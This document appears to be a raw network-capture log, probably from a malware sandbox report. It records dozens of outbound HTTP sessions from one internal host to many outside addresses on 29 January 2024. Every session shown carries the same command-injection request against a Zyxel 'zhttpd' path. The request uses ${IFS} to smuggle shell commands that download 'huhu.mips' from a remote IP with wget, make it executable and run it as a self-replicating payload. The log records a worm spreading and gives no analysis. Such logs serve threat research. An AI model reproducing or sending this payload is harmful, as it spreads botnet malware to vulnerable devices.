                                                Jan 29, 2024 07:07:45.274163008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3726192.168.2.233903277.202.187.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274240017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3727192.168.2.2350866184.193.59.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274302959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3728192.168.2.233595494.236.140.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274360895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3729192.168.2.2354276115.28.30.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274416924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3730192.168.2.2345576183.218.115.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274475098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3731192.168.2.234870886.72.150.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.274538040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3732192.168.2.2335438157.21.76.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.280344963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3733192.168.2.235439895.186.24.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294434071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3734192.168.2.2354888139.107.237.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294473886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3735192.168.2.233920670.226.44.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294543982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3736192.168.2.235050612.5.85.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294616938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3737192.168.2.233994470.158.8.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294677019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3738192.168.2.2334034165.212.86.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294747114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3739192.168.2.233351053.64.8.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294807911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3740192.168.2.233941632.192.90.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294872046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3741192.168.2.2341900122.226.200.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.294948101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3742192.168.2.2352934136.50.82.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295001030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3743192.168.2.233499894.1.126.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295068026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3744192.168.2.2345246113.245.158.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295156002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3745192.168.2.2338402124.205.99.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295212984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3746192.168.2.2335598106.197.110.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295273066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3747192.168.2.2340260161.97.176.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295331955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3748192.168.2.2351242108.60.180.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295383930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3749192.168.2.235743277.95.116.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295448065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3750192.168.2.234462883.229.209.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295514107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3751192.168.2.2339562177.218.242.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295567036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3752192.168.2.2353142124.218.202.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295623064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3753192.168.2.2347634193.100.37.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295690060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3754192.168.2.2333380135.127.140.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295737982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3755192.168.2.2335516222.34.253.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295821905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3756192.168.2.2344130114.195.98.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295880079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3757192.168.2.2352042138.252.118.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.295933008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3758192.168.2.2346188119.221.169.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296000004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3759192.168.2.2340700181.125.176.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296061993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3760192.168.2.233874674.254.53.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296130896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3761192.168.2.2334998103.232.81.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296190977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3762192.168.2.2343140145.182.140.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296247959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3763192.168.2.2342986146.147.85.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296302080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3764192.168.2.2359016221.38.231.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296361923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3765192.168.2.2359424100.253.213.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296452045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3766192.168.2.235405439.41.55.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296493053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3767192.168.2.235513670.56.21.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296561956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3768192.168.2.2351844193.94.126.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296623945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3769192.168.2.2343168213.69.178.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296683073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3770192.168.2.2342396147.82.126.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296777010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3771192.168.2.2355254124.16.139.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296818972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3772192.168.2.2335990157.178.159.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296888113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3773192.168.2.235667286.97.72.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296926975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3774192.168.2.23545549.24.204.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.296997070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3775192.168.2.235495240.23.104.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297058105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3776192.168.2.2355980104.235.140.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297106981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3777192.168.2.2353728189.241.210.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297167063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3778192.168.2.2354656168.227.127.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297229052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3779192.168.2.2347382105.106.20.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297288895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3780192.168.2.2334498149.76.90.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297311068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3781192.168.2.2359974151.153.30.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297391891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3782192.168.2.2359556125.73.66.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297451973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3783192.168.2.2355194115.235.188.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297521114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3784192.168.2.2343484174.105.218.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297574997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3785192.168.2.2352834175.124.238.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297646046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3786192.168.2.2336412161.46.161.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297719955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3787192.168.2.2352690134.14.196.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297785997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3788192.168.2.234754468.112.69.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297849894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3789192.168.2.2341848117.116.51.157443
                                                TimestampBytes transferredDirectionData
